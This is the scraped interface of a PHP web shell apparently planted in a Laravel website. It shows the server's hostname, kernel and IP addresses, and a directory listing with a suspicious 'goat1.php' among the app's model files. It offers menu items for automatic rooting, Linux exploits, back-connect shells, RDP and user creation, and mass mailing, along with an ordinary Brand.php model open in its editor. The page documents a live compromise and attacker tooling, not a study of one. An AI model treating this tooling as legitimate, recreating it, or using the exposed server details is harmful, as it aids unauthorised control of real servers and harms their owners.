Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo2.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
Brand.php
1.93
KB
-rw-r--r--
Currency.php
1.75
KB
-rw-r--r--
Enquiry.php
2.34
KB
-rw-r--r--
Event.php
5.5
KB
-rw-r--r--
EventGoogleCalendar.php
1.8
KB
-rw-r--r--
EventSchedule.php
4.94
KB
-rw-r--r--
Faq.php
1.47
KB
-rw-r--r--
FrontCMSSetting.php
1.57
KB
-rw-r--r--
FrontTestimonial.php
2.85
KB
-rw-r--r--
GoogleCalendarIntegration.php
1.71
KB
-rw-r--r--
GoogleCalendarList.php
1.79
KB
-rw-r--r--
MainReason.php
1.99
KB
-rw-r--r--
PersonalExperience.php
1.3
KB
-rw-r--r--
PlanFeature.php
1.43
KB
-rw-r--r--
Schedule.php
2.38
KB
-rw-r--r--
Service.php
2.93
KB
-rw-r--r--
Setting.php
1.27
KB
-rw-r--r--
Subscribe.php
1.49
KB
-rw-r--r--
Subscription.php
3.13
KB
-rw-r--r--
SubscriptionPlan.php
3.42
KB
-rw-r--r--
Transaction.php
2.02
KB
-rw-r--r--
User.php
16.75
KB
-rw-r--r--
UserGoogleEventSchedule.php
2
KB
-rw-r--r--
UserSchedule.php
3.96
KB
-rw-r--r--
UserSetting.php
1.41
KB
-rw-r--r--
UserTransaction.php
4.1
KB
-rw-r--r--
goat1.php
143.87
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Brand.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Builder; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Database\Eloquent\Model; use Illuminate\Support\Carbon; use Spatie\MediaLibrary\HasMedia; use Spatie\MediaLibrary\InteractsWithMedia; use Spatie\MediaLibrary\MediaCollections\Models\Collections\MediaCollection; use Spatie\MediaLibrary\MediaCollections\Models\Media; /** * Class Brand * * @version December 24, 2021, 7:27 am UTC * * @property int $id * @property int $is_default * @property Carbon|null $created_at * @property Carbon|null $updated_at * @property-read string $brand_logo * @property-read MediaCollection|Media[] $media * @property-read int|null $media_count * * @method static Builder|Brand newModelQuery() * @method static Builder|Brand newQuery() * @method static Builder|Brand query() * @method static Builder|Brand whereCreatedAt($value) * @method static Builder|Brand whereId($value) * @method static Builder|Brand whereIsDefault($value) * @method static Builder|Brand whereUpdatedAt($value) * * @mixin Model */ class Brand extends Model implements HasMedia { use HasFactory, InteractsWithMedia; const BRAND_LOGO = 'brand_logo'; /** * @var string[] */ public static $rules = [ 'brand_logo' => 'required|mimes:png,jpg,jpeg', ]; /** * @var string */ protected $table = 'brands'; /** * @var string[] */ protected $fillable = ['is_default']; /** * @var string[] */ protected $appends = ['brand_logo']; /** * @var string[] */ protected $casts = [ 'is_default' => 'boolean', ]; public function getBrandLogoAttribute(): string { /** @var Media $media */ $media = $this->getMedia(self::BRAND_LOGO)->first(); if (! empty($media)) { return $media->getFullUrl(); } return asset('web/media/avatars/male.png'); } }
Close